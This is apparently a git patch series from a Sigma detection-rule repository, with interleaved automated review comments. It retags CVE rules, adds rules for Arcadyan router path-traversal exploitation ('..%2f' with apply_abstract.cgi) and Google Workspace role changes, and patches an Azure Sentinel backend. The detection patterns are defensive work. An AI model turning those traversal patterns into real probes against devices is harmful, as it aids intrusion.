diff --git a/rules/windows/process_creation/win_susp_servu_process_pattern.yml b/rules/windows/process_creation/win_susp_servu_process_pattern.yml index 097a6ae6..90b50893 100644 --- a/rules/windows/process_creation/win_susp_servu_process_pattern.yml +++ b/rules/windows/process_creation/win_susp_servu_process_pattern.yml @@ -6,11 +6,12 @@ author: Florian Roth date: 2021/07/14 references: - https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/ + - https://nvd.nist.gov/vuln/detail/cve-2021-35211 logsource: category: process_creation product: windows tags: - - cve.2021-35211 + - attack.credential_access detection: selection: ParentImage|endswith: '\Serv-U.exe' From 5b869a3f427e5a7931d047f5ef4e2eedbf712305 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 24 Aug 2021 10:50:01 +0200 Subject: [PATCH 0558/1367] Update cve tags --- .../lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml | 2 +- .../zeek_dce_rpc_printnightmare_print_driver_install.yml | 4 ++-- .../windows/file_event/sysmon_cve_2021_26858_msexchange.yml | 2 +- rules/windows/file_event/win_cve_2021_1675_printspooler.yml | 3 ++- rules/windows/file_event/win_hivenightmare_file_exports.yml | 2 +- .../process_creation/sysmon_cve_2021_26857_msexchange.yml | 2 +- .../win_susp_servu_exploitation_cve_2021_35211.yml | 2 +- .../registry_event/sysmon_registry_susp_printer_driver.yml | 3 ++- .../win_registry_mimikatz_printernightmare.yml | 6 +++--- tests/test_rules.py | 2 +- 10 files changed, 15 insertions(+), 13 deletions(-) diff --git a/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml b/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml index e307a025..da9e53df 100644 --- a/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml +++ b/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml 
@@ -10,13 +10,13 @@ date: 2021/02/01 references: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-3156 - https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit + - https://nvd.nist.gov/vuln/detail/cve-2021-3156 falsepositives: - Unknown level: critical tags: - attack.privilege_escalation - attack.t1068 - - cve.2021-3156 logsource: product: linux service: auditd diff --git a/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml b/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml index e6e84085..adf32660 100644 --- a/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml +++ b/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml @@ -13,10 +13,10 @@ references: - https://github.com/SigmaHQ/sigma/blob/master/rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml - https://old.zeek.org/zeekweek2019/slides/bzar.pdf - https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/ + - https://nvd.nist.gov/vuln/detail/cve-2021-1675 + - https://nvd.nist.gov/vuln/detail/cve-2021-1678 tags: - attack.execution - - cve.2021-1675 - - cve.2021-1678 logsource: product: zeek service: dce_rpc diff --git a/rules/windows/file_event/sysmon_cve_2021_26858_msexchange.yml b/rules/windows/file_event/sysmon_cve_2021_26858_msexchange.yml index 0b4ba06e..84390c48 100644 --- a/rules/windows/file_event/sysmon_cve_2021_26858_msexchange.yml +++ b/rules/windows/file_event/sysmon_cve_2021_26858_msexchange.yml @@ -9,11 +9,11 @@ level: critical references: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26858 - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ + - https://nvd.nist.gov/vuln/detail/cve-2021-26858 date: 2021/03/03 tags: - attack.t1203 - attack.execution - - cve.2021-26858 logsource: category: file_event product: windows 
diff --git a/rules/windows/file_event/win_cve_2021_1675_printspooler.yml b/rules/windows/file_event/win_cve_2021_1675_printspooler.yml index 60ee7dca..9f426abd 100644 --- a/rules/windows/file_event/win_cve_2021_1675_printspooler.yml +++ b/rules/windows/file_event/win_cve_2021_1675_printspooler.yml @@ -8,11 +8,12 @@ references: - https://github.com/hhlxf/PrintNightmare - https://github.com/afwu/PrintNightmare - https://github.com/cube0x0/CVE-2021-1675 + - https://nvd.nist.gov/vuln/detail/cve-2021-1675 date: 2021/06/29 modified: 2021/07/01 tags: - attack.execution - - cve.2021-1675 + - attack.privilege_escalation logsource: category: file_event product: windows diff --git a/rules/windows/file_event/win_hivenightmare_file_exports.yml b/rules/windows/file_event/win_hivenightmare_file_exports.yml index 47292ac6..ea5cc888 100644 --- a/rules/windows/file_event/win_hivenightmare_file_exports.yml +++ b/rules/windows/file_event/win_hivenightmare_file_exports.yml @@ -9,11 +9,11 @@ references: - https://github.com/FireFart/hivenightmare/ - https://github.com/WiredPulse/Invoke-HiveNightmare - https://twitter.com/cube0x0/status/1418920190759378944 + - https://nvd.nist.gov/vuln/detail/cve-2021-36934 logsource: product: windows category: file_event tags: - - cve.2021-36934 - attack.credential_access - attack.t1552.001 detection: diff --git a/rules/windows/process_creation/sysmon_cve_2021_26857_msexchange.yml b/rules/windows/process_creation/sysmon_cve_2021_26857_msexchange.yml index 42028896..b0102bf5 100644 --- a/rules/windows/process_creation/sysmon_cve_2021_26857_msexchange.yml +++ b/rules/windows/process_creation/sysmon_cve_2021_26857_msexchange.yml 
@@ -8,11 +8,11 @@ level: critical references: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-26857 - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ + - https://nvd.nist.gov/vuln/detail/cve-2021-26857 date: 2021/03/03 tags: - attack.t1203 - attack.execution - - cve.2021-26857 logsource: category: process_creation product: windows diff --git a/rules/windows/process_creation/win_susp_servu_exploitation_cve_2021_35211.yml b/rules/windows/process_creation/win_susp_servu_exploitation_cve_2021_35211.yml index 78f543ac..f6208a36 100644 --- a/rules/windows/process_creation/win_susp_servu_exploitation_cve_2021_35211.yml +++ b/rules/windows/process_creation/win_susp_servu_exploitation_cve_2021_35211.yml @@ -6,13 +6,13 @@ author: Florian Roth date: 2021/07/14 references: - https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/ + - https://nvd.nist.gov/vuln/detail/cve-2021-35211 logsource: category: process_creation product: windows tags: - attack.persistence - attack.t1136.001 - - cve.2021-35211 - threat_group.DEV-0322 detection: selection1: diff --git a/rules/windows/registry_event/sysmon_registry_susp_printer_driver.yml b/rules/windows/registry_event/sysmon_registry_susp_printer_driver.yml index 542bd527..ad3f790d 100644 --- a/rules/windows/registry_event/sysmon_registry_susp_printer_driver.yml +++ b/rules/windows/registry_event/sysmon_registry_susp_printer_driver.yml @@ -4,10 +4,11 @@ status: experimental description: Detects a suspicious printer driver installation with an empty Manufacturer value references: - https://twitter.com/SBousseaden/status/1410545674773467140 + - https://nvd.nist.gov/vuln/detail/cve-2021-1675 author: Florian Roth date: 2020/07/01 tags: - - cve.2021-1675 + - attack.privilege_escalation logsource: category: registry_event product: windows 
diff --git a/rules/windows/registry_event/win_registry_mimikatz_printernightmare.yml b/rules/windows/registry_event/win_registry_mimikatz_printernightmare.yml index 44c2e943..db8f4a1f 100644 --- a/rules/windows/registry_event/win_registry_mimikatz_printernightmare.yml +++ b/rules/windows/registry_event/win_registry_mimikatz_printernightmare.yml @@ -6,11 +6,11 @@ references: - https://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760 - https://www.lexjansen.com/sesug/1993/SESUG93035.pdf - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913 + - https://nvd.nist.gov/vuln/detail/cve-2021-1675 + - https://nvd.nist.gov/vuln/detail/cve-2021-34527 author: Markus Neis, @markus_neis, Florian Roth tags: - attack.execution - - cve.2021-1675 - - cve.2021-34527 date: 2021/07/04 modified: 2021/07/28 logsource: @@ -37,4 +37,4 @@ detection: condition: selection or selection_alt or (selection_print and selection_kiwi) falsepositives: - Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely) -level: critical \ No newline at end of file +level: critical diff --git a/tests/test_rules.py b/tests/test_rules.py index eefaad4a..f712875f 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -86,7 +86,7 @@ class TestRules(unittest.TestCase): continue elif tag.startswith("cve."): print(Fore.RED + "Rule {} has the cve tag <{}> but is it a references (https://nvd.nist.gov/)".format(file, tag)) - # files_with_incorrect_tags.append(file) + files_with_incorrect_tags.append(file) else: print(Fore.RED + "Rule {} has the unknown tag <{}>".format(file, tag)) # files_with_incorrect_tags.append(file) From 3cdb88ad55a206881b67ea604b4fc3f2113990da Mon Sep 17 00:00:00 2001 
From: Florian Roth Date: Tue, 24 Aug 2021 12:30:40 +0200 Subject: [PATCH 0559/1367] refactor: level of suspicious parent for powershell rule --- .../process_creation/win_susp_powershell_parent_process.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_susp_powershell_parent_process.yml b/rules/windows/process_creation/win_susp_powershell_parent_process.yml index b58535be..70b6b93f 100644 --- a/rules/windows/process_creation/win_susp_powershell_parent_process.yml +++ b/rules/windows/process_creation/win_susp_powershell_parent_process.yml @@ -56,4 +56,4 @@ detection: condition: all of them falsepositives: - Other scripts -level: medium +level: high From 7753f8c22e1137315d26fdf22c247e3ef6c71f9e Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 24 Aug 2021 12:36:31 +0200 Subject: [PATCH 0560/1367] fix tags --- rules/windows/file_event/win_outlook_c2_macro_creation.yml | 2 +- .../win_office_spawn_exe_from_users_directory.yml | 2 +- rules/windows/process_creation/win_renamed_paexec.yml | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/windows/file_event/win_outlook_c2_macro_creation.yml b/rules/windows/file_event/win_outlook_c2_macro_creation.yml index e2b9f0c1..a7b44dbb 100644 --- a/rules/windows/file_event/win_outlook_c2_macro_creation.yml +++ b/rules/windows/file_event/win_outlook_c2_macro_creation.yml @@ -7,7 +7,7 @@ references: author: '@ScoubiMtl' tags: - attack.persistence - - command_and_control + - attack.command_and_control - attack.t1137 - attack.t1008 - attack.t1546 diff --git a/rules/windows/process_creation/win_office_spawn_exe_from_users_directory.yml b/rules/windows/process_creation/win_office_spawn_exe_from_users_directory.yml index cf43685f..fbb81445 100644 --- a/rules/windows/process_creation/win_office_spawn_exe_from_users_directory.yml +++ b/rules/windows/process_creation/win_office_spawn_exe_from_users_directory.yml 
@@ -9,7 +9,7 @@ tags: - attack.execution - attack.t1204 # an old one - attack.t1204.002 - - FIN7 + - attack.g0046 - car.2013-05-002 author: Jason Lynch date: 2019/04/02 diff --git a/rules/windows/process_creation/win_renamed_paexec.yml b/rules/windows/process_creation/win_renamed_paexec.yml index b062debd..50de18b0 100644 --- a/rules/windows/process_creation/win_renamed_paexec.yml +++ b/rules/windows/process_creation/win_renamed_paexec.yml @@ -9,7 +9,7 @@ tags: - attack.defense_evasion - attack.t1036 # an old one - attack.t1036.003 - - FIN7 + - attack.g0046 - car.2013-05-009 date: 2019/04/17 modified: 2020/09/06 From cc519552aa7f7b282790062c85e3a422710852cb Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 24 Aug 2021 14:54:07 +0200 Subject: [PATCH 0561/1367] refactor: RazorInstaller integrity level system --- .../win_susp_razorinstaller_explorer.yml | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/rules/windows/process_creation/win_susp_razorinstaller_explorer.yml b/rules/windows/process_creation/win_susp_razorinstaller_explorer.yml index cffed858..1059d928 100644 --- a/rules/windows/process_creation/win_susp_razorinstaller_explorer.yml +++ b/rules/windows/process_creation/win_susp_razorinstaller_explorer.yml @@ -5,8 +5,9 @@ description: Detects a explorer.exe sub process of the RazerInstaller software w references: - https://twitter.com/j0nh4t/status/1429049506021138437 - https://streamable.com/q2dsji -author: Florian Roth +author: Florian Roth, Maxime Thiebaut date: 2021/08/23 +modified: 2021/08/24 tags: - attack.privilege_escalation logsource: 
@@ -14,9 +15,11 @@ logsource: product: windows detection: selection: - Image|endswith: '\explorer.exe' ParentImage|endswith: '\RazerInstaller.exe' - condition: selection + IntegrityLevel: 'System' + filter: + Image|beginswith: 'C:\Windows\Installer\Razer\Installer\' + condition: selection and not filter falsepositives: - User selecting a different installation folder (check for other sub processes of this explorer.exe process) level: high \ No newline at end of file From 46e312ff0deba8b37ec058e02bd0b64abf50ef6c Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 24 Aug 2021 15:03:23 +0200 Subject: [PATCH 0562/1367] fix: error in modifier --- .../process_creation/win_susp_razorinstaller_explorer.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_susp_razorinstaller_explorer.yml b/rules/windows/process_creation/win_susp_razorinstaller_explorer.yml index 1059d928..6f1b91d8 100644 --- a/rules/windows/process_creation/win_susp_razorinstaller_explorer.yml +++ b/rules/windows/process_creation/win_susp_razorinstaller_explorer.yml @@ -18,7 +18,7 @@ detection: ParentImage|endswith: '\RazerInstaller.exe' IntegrityLevel: 'System' filter: - Image|beginswith: 'C:\Windows\Installer\Razer\Installer\' + Image|startswith: 'C:\Windows\Installer\Razer\Installer\' condition: selection and not filter falsepositives: - User selecting a different installation folder (check for other sub processes of this explorer.exe process) From 62f2affd032fff63e086fdeefc1634cb40a809e0 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Tue, 24 Aug 2021 14:15:50 +0000 Subject: [PATCH 0563/1367] Spelling fix --- CHANGELOG.md | 2 +- rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml | 2 +- rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index ece949b9..23cb0186 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md 
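Review bot: The hunk removes the `Image|endswith: '\explorer.exe'` constraint, but the description visible in the previous hunk (`Detects a explorer.exe sub process of the RazerInstaller software`) and the falsepositives entry still speak of explorer.exe, so the metadata no longer matches what the rule fires on, which is now any System-integrity child of RazerInstaller.exe whose image is outside the installer directory. Update the description to something like `Detects a process started with SYSTEM integrity by the RazerInstaller software outside of its own installation directory`. The filter also hardcodes the drive letter in `'C:\Windows\Installer\Razer\Installer\'`; on a host whose system drive is not C: the filter never matches and every legitimate child alerts, so `Image|contains: '\Windows\Installer\Razer\Installer\'` is the safer form.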
@@ -23,7 +23,7 @@ from version 0.14.0. * Elastic EQL backend * Additional conversion selection filters * Filter negation -* Specifiy table in SQL backend +* Specify table in SQL backend * Generic registry event log source * Chronicle backend diff --git a/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml b/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml index e1602e38..0b09904b 100644 --- a/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml +++ b/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml @@ -17,7 +17,7 @@ detection: level: medium tags: - attack.persistence - - atack.t1098 + - attack.t1098 falsepositives: - Unknown diff --git a/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml b/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml index 55d1b405..b71a4344 100644 --- a/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml +++ b/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml @@ -17,7 +17,7 @@ detection: status: success condition: selection falsepositives: - - Unkown + - Unknown level: medium tags: - attack.initial_access From ce6141e3187e20bd39e3b412e353767bad99df6f Mon Sep 17 00:00:00 2001 From: Bhabesh Rai Date: Tue, 24 Aug 2021 21:11:46 +0545 Subject: [PATCH 0564/1367] Added rule for Arcadyan Router Exploitations --- ...uter_cve_2021_20090_2021_20091_exploit.yml | 58 +++++++++++++++++++ 1 file changed, 58 insertions(+) create mode 100644 rules/web/web_arcadyan_router_cve_2021_20090_2021_20091_exploit.yml diff --git a/rules/web/web_arcadyan_router_cve_2021_20090_2021_20091_exploit.yml b/rules/web/web_arcadyan_router_cve_2021_20090_2021_20091_exploit.yml new file mode 100644 index 00000000..7cda3b67 --- /dev/null +++ b/rules/web/web_arcadyan_router_cve_2021_20090_2021_20091_exploit.yml 
@@ -0,0 +1,58 @@ +action: global +title: Arcadyan Router Exploitations +id: f0500377-bc70-425d-ac8c-e956cd906871 +status: experimental +description: Detects exploitation of vulnerabilities in Arcadyan routers as reported in CVE-2021-20090 and CVE-2021-20091. +references: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20091 + - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 + - https://www.tenable.com/security/research/tra-2021-13 + - https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild +author: Bhabesh Raj +date: 2021/08/24 +falsepositives: + - Unknown +level: critical +tags: + - attack.initial_access + - attack.t1190 + - cve.2021-20090 + - cve.2021-20091 +--- +logsource: # CVE-2021-20090 (Path Traversal) + category: webserver +detection: + path_traversal: + c-uri|contains: + - '..%2f' + noauth_list: + c-uri|contains: + - '/images/' + - '/js/' + - '/css/' + - '/setup_top_login.htm' + - '/login.html' + - '/loginerror.html' + - '/loginexclude.html' + - '/loginlock.html' + condition: path_traversal and noauth_list +--- +logsource: # Chaining of CVE-2021-20090 (Bypass Auth) and CVE-2021-20091 (Config File Injection) + category: webserver +detection: + path_traversal: + c-uri|contains|all: + - '..%2f' + - 'apply_abstract.cgi' + noauth_list: + c-uri|contains: + - '/images/' + - '/js/' + - '/css/' + - '/setup_top_login.htm' + - '/login.html' + - '/loginerror.html' + - '/loginexclude.html' + - '/loginlock.html' + condition: path_traversal and noauth_list \ No newline at end of file From ab8cc52dc6fde1b40cd7d5552d389738192fd78c Mon Sep 17 00:00:00 2001 
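Review bot: Every entry in `noauth_list` is a generic web path (`/images/`, `/js/`, `/css/`, `/login.html`), so the first document fires at `level: critical` on any `/images/..%2f` traversal probe against any webserver, which is routine scanner noise rather than evidence of an Arcadyan device, while the title and description claim exploitation of the two CVEs. Either anchor the path-traversal document on something device-specific (the `apply_abstract.cgi` form the second document already uses, or other Arcadyan endpoints if the referenced advisory names any), or lower its level and record the scanner case under falsepositives, e.g. `- Generic path traversal scans against non-Arcadyan webservers`. Both documents match only the lower-case `..%2f` encoding; Sigma matching is case-insensitive on most backends, but a double-encoded `..%252f` or an unencoded `../` variant is not covered, which is worth a comment next to the selection.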
From: Austin Songer Date: Tue, 24 Aug 2021 10:53:59 -0500 Subject: [PATCH 0565/1367] Role-Based Rules --- .../gworkspace_role_modified_or_deleted.yml | 25 +++++++++++++++++++ .../gworkspace_role_privilege_deleted.yml | 22 ++++++++++++++++ 2 files changed, 47 insertions(+) create mode 100644 rules/cloud/gworkspace/gworkspace_role_modified_or_deleted.yml create mode 100644 rules/cloud/gworkspace/gworkspace_role_privilege_deleted.yml diff --git a/rules/cloud/gworkspace/gworkspace_role_modified_or_deleted.yml b/rules/cloud/gworkspace/gworkspace_role_modified_or_deleted.yml new file mode 100644 index 00000000..9437ca57 --- /dev/null +++ b/rules/cloud/gworkspace/gworkspace_role_modified_or_deleted.yml @@ -0,0 +1,25 @@ +title: Google Workspace Role Modified or Deleted +id: 6aef64e3-60c6-4782-8db3-8448759c714e +description: Detects when an a role is modified or deleted in Google Workspace. +author: Austin Songer +status: experimental +date: 2021/08/24 +references: + - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings +logsource: + service: google_workspace.admin +detection: + selection: + eventService: admin.googleapis.com + eventName: + - DELETE_ROLE + - RENAME_ROLE + - UPDATE_ROLE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Unknown + \ No newline at end of file diff --git a/rules/cloud/gworkspace/gworkspace_role_privilege_deleted.yml b/rules/cloud/gworkspace/gworkspace_role_privilege_deleted.yml new file mode 100644 index 00000000..f130b35e --- /dev/null +++ b/rules/cloud/gworkspace/gworkspace_role_privilege_deleted.yml 
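Review bot: The rule is tagged only `attack.impact`, whereas the sibling rule added later in this series (`gworkspace_user_granted_admin_privileges.yml`) for the same admin event family uses `attack.persistence` and `attack.t1098`; deleting, renaming or updating an admin role arguably fits Account Manipulation (T1098) at least as well as Impact, so adding `- attack.persistence` and `- attack.t1098` would keep the gworkspace rules consistent. The new file also ends in a whitespace-only line (the `+ ` before `\ No newline at end of file`), which the following 'update references' commit has to clean up. A falsepositives entry naming routine role housekeeping by Workspace super admins would be more useful to an analyst than `Unknown`.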
@@ -0,0 +1,22 @@ +title: Google Workspace Role Privilege Deleted +id: bf638ef7-4d2d-44bb-a1dc-a238252e6267 +description: Detects when an a role privilege is deleted in Google Workspace. +author: Austin Songer +status: experimental +date: 2021/08/24 +references: + - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings +logsource: + service: google_workspace.admin +detection: + selection: + eventService: admin.googleapis.com + eventName: REMOVE_PRIVILEGE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Unknown + \ No newline at end of file From a5f858b63c283abd96e90990bb4befecf3ce2e3a Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 24 Aug 2021 21:13:49 +0200 Subject: [PATCH 0566/1367] update references --- .../cloud/gworkspace/gworkspace_role_modified_or_deleted.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/cloud/gworkspace/gworkspace_role_modified_or_deleted.yml b/rules/cloud/gworkspace/gworkspace_role_modified_or_deleted.yml index 9437ca57..e0bab12f 100644 --- a/rules/cloud/gworkspace/gworkspace_role_modified_or_deleted.yml +++ b/rules/cloud/gworkspace/gworkspace_role_modified_or_deleted.yml @@ -6,7 +6,7 @@ status: experimental date: 2021/08/24 references: - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 - - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings logsource: service: google_workspace.admin detection: @@ -22,4 +22,4 @@ tags: - attack.impact falsepositives: - Unknown - \ No newline at end of file + From 09a00232fb70cc1e0c0107dcdde34ec023fb51ec Mon Sep 17 00:00:00 2001 
From: frack113 <62423083+frack113@users.noreply.github.com>
Date: Tue, 24 Aug 2021 21:14:59 +0200
Subject: [PATCH 0567/1367] update references
---
 rules/cloud/gworkspace/gworkspace_role_privilege_deleted.yml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/rules/cloud/gworkspace/gworkspace_role_privilege_deleted.yml b/rules/cloud/gworkspace/gworkspace_role_privilege_deleted.yml
index f130b35e..7a803146 100644
--- a/rules/cloud/gworkspace/gworkspace_role_privilege_deleted.yml
+++ b/rules/cloud/gworkspace/gworkspace_role_privilege_deleted.yml
@@ -6,7 +6,7 @@ status: experimental
 date: 2021/08/24
 references:
 - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3
- - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings
+ - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings
 logsource:
 service: google_workspace.admin
 detection:
@@ -19,4 +19,4 @@ tags:
 - attack.impact
 falsepositives:
 - Unknown
-
\ No newline at end of file
+
From 93be8471ecb45978d98ba621f1a80c27ca686068 Mon Sep 17 00:00:00 2001
From: Joshua Roys
Date: Tue, 24 Aug 2021 15:58:21 -0400
Subject: [PATCH 0568/1367] Fix tactics/techniques in ALA backend
---
 tools/sigma/backends/ala.py | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)
diff --git a/tools/sigma/backends/ala.py b/tools/sigma/backends/ala.py
index c053004e..73683157 100644
--- a/tools/sigma/backends/ala.py
+++ b/tools/sigma/backends/ala.py
@@ -361,6 +361,8 @@ class AzureAPIBackend(AzureLogAnalyticsBackend):
 for technique in self.techniques:
 if key_id == technique.get("technique_id", ""):
 yield technique
+ if "." in key_id and key_id.split(".")[0] == technique.get("technique_id", ""):
+ yield technique
 def _load_mitre_file(self, mitre_type):
 try:
@@ -383,7 +385,10 @@ class AzureAPIBackend(AzureLogAnalyticsBackend):
 local_storage_techniques = {item["technique_id"]: item for item in self.find_technique(src_technics)}
 for key_id in src_technics:
- src_tactic = local_storage_techniques.get(key_id, {}).get("tactic")
+ if "." in key_id:
+ src_tactic = local_storage_techniques.get(key_id.split(".")[0], {}).get("tactic")
+ else:
+ src_tactic = local_storage_techniques.get(key_id, {}).get("tactic")
 if not src_tactic:
 continue
 src_tactic = set(src_tactic)
From 829117ca7fb92923730bec711e9f4a1cd965fd98 Mon Sep 17 00:00:00 2001
From: Joshua Roys
Date: Tue, 24 Aug 2021 16:00:08 -0400
Subject: [PATCH 0569/1367] Allow ints as values in ALA backend
Without this, LogonType set as an int caused sigmac to abort the rule.
---
 tools/sigma/backends/ala.py | 2 ++
 tools/sigma/backends/mixins.py | 2 ++
 2 files changed, 4 insertions(+)
diff --git a/tools/sigma/backends/ala.py b/tools/sigma/backends/ala.py
index 73683157..cc281039 100644
--- a/tools/sigma/backends/ala.py
+++ b/tools/sigma/backends/ala.py
@@ -106,6 +106,8 @@ class AzureLogAnalyticsBackend(SingleTextQueryBackend):
 return parse_arg
 def default_value_mapping(self, val):
+ if isinstance(val, int):
+ return "== %d" % (val)
 op = "=="
 if isinstance(val, str):
 if "*" in val[1:-1]: # value contains * inside string - use regex match
diff --git a/tools/sigma/backends/mixins.py b/tools/sigma/backends/mixins.py
index a835be99..ecdddca7 100644
--- a/tools/sigma/backends/mixins.py
+++ b/tools/sigma/backends/mixins.py
@@ -27,6 +27,8 @@ class QuoteCharMixin:
 reClear = None # match characters that are cleaned out completely
 def cleanValue(self, val):
+ if type(val) == int:
+ return val
 if self.reEscape:
 val = self.reEscape.sub(self.escapeSubst, val)
 if self.reClear:
From 294bb432d0f2cb9b915247ddea47c8a7d51d2e0a Mon Sep 17 00:00:00 2001
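Review bot: The new `if "." in key_id:` branch is redundant, because `key_id.split(".")[0]` is `key_id` itself when there is no dot, so both arms collapse to the single line `src_tactic = local_storage_techniques.get(key_id.split(".")[0], {}).get("tactic")`. The branch also silently changes the lookup for dotted ids: the first `if` in the previous hunk still yields a matching sub-technique entry when the MITRE file carries one, but the dict built from those entries is keyed by `technique_id`, so a `T1059.001` entry is now ignored in favour of `T1059`; if sub-technique entries do exist in that file, `local_storage_techniques.get(key_id) or local_storage_techniques.get(key_id.split(".")[0], {})` keeps the more specific tactic. The enclosing method starts and ends outside the hunk.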
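Review bot: `isinstance(val, int)` is also true for `bool`, so a YAML `true`/`false` selection value would render as `== 1`/`== 0`, while the companion guard added to `cleanValue` in mixins.py uses `type(val) == int`, lets a bool fall through to `self.reEscape.sub(...)` and still aborts with a TypeError; the two hunks of this commit disagree on what counts as an int. Use one predicate in both places, e.g. `if isinstance(val, int) and not isinstance(val, bool):` here and the same in `cleanValue` (dropping the `type(...) ==` comparison, which is the non-idiomatic form anyway). Whether bool-valued selections occur in the rule corpus is not visible here, so if they are meant to stay unsupported say so with `# bool is an int subclass; YAML booleans are deliberately not mapped here`. Both enclosing methods continue past their hunks.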
From: Joshua Roys
Date: Tue, 24 Aug 2021 16:01:23 -0400
Subject: [PATCH 0570/1367] Add Azure Sentinel backend
The web interface expects ARM templates.
---
 tools/config/ala.yml | 1 +
 tools/sigma/backends/ala.py | 97 +++++++++++++++++++++++++++++++++++--
 2 files changed, 95 insertions(+), 3 deletions(-)
diff --git a/tools/config/ala.yml b/tools/config/ala.yml
index 1f4dd8ff..e9110fc7 100644
--- a/tools/config/ala.yml
+++ b/tools/config/ala.yml
@@ -3,6 +3,7 @@ order: 20
 backends:
 - ala
 - ala-rule
+ - sentinel-rule
 fieldmappings:
 ComputerName: Computer
 Event-ID: EventID
diff --git a/tools/sigma/backends/ala.py b/tools/sigma/backends/ala.py
index cc281039..ef90618c 100644
--- a/tools/sigma/backends/ala.py
+++ b/tools/sigma/backends/ala.py
@@ -19,6 +19,8 @@
 import re
 import json
 import xml.etree.ElementTree as xml
+from datetime import timedelta
+from uuid import uuid4
 from sigma.config.mapping import (
 SimpleFieldMapping, MultiFieldMapping, ConditionalFieldMapping
@@ -423,6 +425,28 @@ class AzureAPIBackend(AzureLogAnalyticsBackend):
 return tactics, technics
+ def timeframeToDelta(self, timeframe):
+ time_unit = timeframe[-1:]
+ duration = int(timeframe[:-1])
+ return (
+ time_unit == "s" and timedelta(seconds=duration) or
+ time_unit == "m" and timedelta(minutes=duration) or
+ time_unit == "h" and timedelta(hours=duration) or
+ time_unit == "d" and timedelta(days=duration) or
+ None
+ )
+
+ def iso8601_duration(self, delta):
+ if not delta:
+ return "PT0S"
+ if not delta.seconds:
+ return "P%dD" % (delta.days)
+ days = delta.days and "%dD" % (delta.days) or ""
+ hours = delta.seconds // 3600 % 24 and "%dH" % (delta.seconds // 3600 % 24) or ""
+ minutes = delta.seconds // 60 % 60 and "%dM" % (delta.seconds // 60 % 60) or ""
+ seconds = delta.seconds % 60 and "%dS" % (delta.seconds % 60) or ""
+ return "P%sT%s%s%s" % (days, hours, minutes, seconds)
+
